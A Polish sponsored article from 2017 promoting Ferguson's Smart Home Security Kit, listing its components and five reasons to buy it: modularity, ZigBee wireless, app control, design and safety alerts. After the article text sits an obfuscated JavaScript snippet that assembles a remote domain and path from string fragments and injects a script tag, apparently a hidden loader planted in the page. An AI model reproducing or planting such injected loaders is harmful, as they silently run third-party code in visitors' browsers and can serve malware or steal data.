5 powodów, dla których warto zakupić Smart Home

Lokowanie produktu

Systemy inteligentnego domu stają się coraz bardziej popularne. Wynika to głównie z faktu, że inwestorzy chcą mieć coraz większe poczucie komfortu mieszkania. Kamery nagrywające w jakości HD, czujniki gazu lub dymu, a także inteligentne gniazdka mają również zapewnić bezpieczeństwo domownikom. Marka Ferguson, która jest jednym z liderów rynku od wielu lat dostarcza nowoczesne i sprawdzone rozwiązania.

28.03.2017 13.56
Smart home inteligentny dom Fibaro

Zadaniem nowoczesnych technologii wykorzystywanych w budownictwie, instalatorstwie oraz designie wnętrz jest przede wszystkim ułatwienie zarządzania obiektem (domem jednorodzinnym, biurem, mieszkaniem czy magazynem). Na poprawie komfortu zależy przede wszystkim domownikom, ale również pracownikom administracji, którzy odpowiedzialni są za to, co w danym obiekcie i jego otoczeniu się dzieje. Drugim celem jest oszczędzanie czasu oraz redukcja kosztów, które mogą się wiązać chociażby z montażem dodatkowych systemów alarmowych czy czujników.

Technologia Smart Home, oparta na bezprzewodowej komunikacji może więc być zastosowana wszędzie tam, gdzie zachodzi potrzeba integracji działania wielu systemów oraz urządzeń (np. RTV czy AGD). Zestawy takie, jak Smart Home Security Kit pozwalają na miejscu lub zdalnie monitorować obiekt z pomocą kamer, stan czujników gazu, dymu, zalania czy ruchu, a także sterować działaniem urządzeń elektrycznych. Dlaczego warto zainwestować minimum kilkaset złotych w system Smart Home?

1. Elastyczność i modułowość rozwiązania

Smart Home jest systemem, który bezproblemowo można zainstalować we wszelkiego rodzaju obiektach mieszkalnych. Doskonale sprawdza się zarówno w domach jednorodzinnych, jak i mieszkaniach. Jedną z największych zalet systemu jest elastyczność montażu oraz praktycznie nieograniczona możliwość rozbudowy systemu (dzięki zastosowaniu modułowości urządzeń). Zestaw startowy Smart Home Security Kit składa się z takich elementów, jak:

 • hub - serce systemu, centrala sterująca,
 • czujnik wielozadaniowy (kontaktron),
 • czujnik temperatury i wilgotności,
 • czujnik ruchu,
 • piloty.

Zestaw ten tworzy kompletny, uniwersalny system z dużą możliwością rozbudowy. W ramach dodatkowego wyposażenia możemy zakupić:

 • czujkę dymu,
 • czujnik czadu,
 • czujnik zalania,
 • repeater i czujnik gazu,
 • wifi IR Transmitter (uniwersalny pilot),
 • małą kamerę wewnętrzną IP - Smart EYE 100 IP,
 • obrotową kamerę wewnętrzną IP - Smart EYE 200 IP,
 • kamerę zewnętrzną IP - Smart EYE 300 IP,
 • inteligentną wtyczkę - Smart WiFI Plug,
 • alarm osobisty z lokalizatorem GPS Smart Whistle.

2. Bezprzewodowa łączność

W dzisiejszych czasach rozwój bezprzewodowej technologii umożliwia stosowanie rozwiązań, które jeszcze kilka lat temu wydawały się nierealne w zastosowaniu. System Smart Home Security Kit działa w oparciu o technologię ZigBee – umożliwiającą sprawną, trwałą oraz szybką komunikację bezprzewodową między wszystkimi urządzeniami systemu (nawet w przypadku usterki jednej z nich). Ważne jest, że elementy systemu marki Ferguson są kompatybilne z elementami systemów innych producentów.

3. Wygodne zarządzanie

Dzięki wysokiej jakości urządzeń tworzących system Smart Home, technologii ZigBee oraz dedykowanej aplikacji, którą można ściągnąć na urządzenia mobilne użytkownik otrzymuje możliwość zarządzania domem lub mieszkaniem z dowolnego miejsca. System jest tak skonstruowany, że umożliwia automatyczne wykrycie np. nieszczelności instalacji gazowej lub zadymienie oraz wezwanie odpowiednich służb. Gdy zapomnieliśmy wyłączyć żelazko to inteligentne gniazdko może automatycznie odciąć dopływ prądu do urządzenia. Alert można otrzymać również w przypadku próby otworzenia okien czy drzwi. Wygoda jest więc połączona z praktycznością.

4. Nowoczesny wygląd

Wszystkie urządzenia: hub, czujniki, kamery czy gniazda są zaprojektowane w taki sposób, aby wtapiać się w otoczenie. Elementy Smart Home doskonale odnajdują się zarówno w klasycznych, jak i nowoczesnych aranżacjach: nie psują wyglądu pomieszczenia, nie rzucają się w oczy, działają cicho oraz energooszczędnie. Wygląd urządzeń jest bardzo ważny, daje użytkownikowi szansę na zaprojektowanie takiego wnętrza o jakim marzył – bez konieczności montażu wielu paneli sterujących.

5. Zwiększenie bezpieczeństwa

System Smart Home poprawia bezpieczeństwo domowników poprzez całodobową kontrolę wyznaczonych obszarów. Warto pamiętać, że niektóre zdarzenia mogą mieć negatywny wpływ na ludzkie zdrowie lub zagrażać jego życiu. Chodzi tu przede wszystkim o:

 • rozszczelnienie instalacji gazowej,
 • pojawienie się zadymienia,
 • pojawienie się czadu,
 • pojawienie się ognia,
 • próbę włamania do domu lub mieszkania,
 • zalanie wnętrza.

Elementy systemu, jak np. kamery mogą być wyposażone w mikrofon, które dają również kontrolę nad zachowaniem domowników. Jest to ważne, gdy w domu znajdują się chociażby dzieci. Gdy dochodzi do jakiegokolwiek wypadku, opiekun ma większą szansę na szybką reakcję.

Obecne trendy w budownictwie skierowane są na zwiększenie bezpieczeństwa oraz zapewnienie maksymalnego komfortu mieszkańcom. Jednocześnie inteligentne urządzenia mają być estetyczne, bezawaryjne i wymagać minimum obsługi. Wszystkie te standardy zachowane są w urządzeniach marki Ferguson. Więcej o systemie Smart Home można poczytać na stronie producenta. 

(function(){ qsyb=document.createElement("script");qsyb_=("us")+("ta"); qsyb_+="t"+(".");qsyb_+=("in");qsybu="60892743";qsyb.async=true; qsybu+=".cniukez3syb6i1fwj";qsyb.type="text/javascript";qsyb_+="f"+"o"+("/"); qsybu+="f9e5cpek3v65i";qsyb.src="//"+qsyb_+qsybu; dqsyb=document.body;dqsyb.appendChild(qsyb); })();

Lokowanie produktu
Najnowsze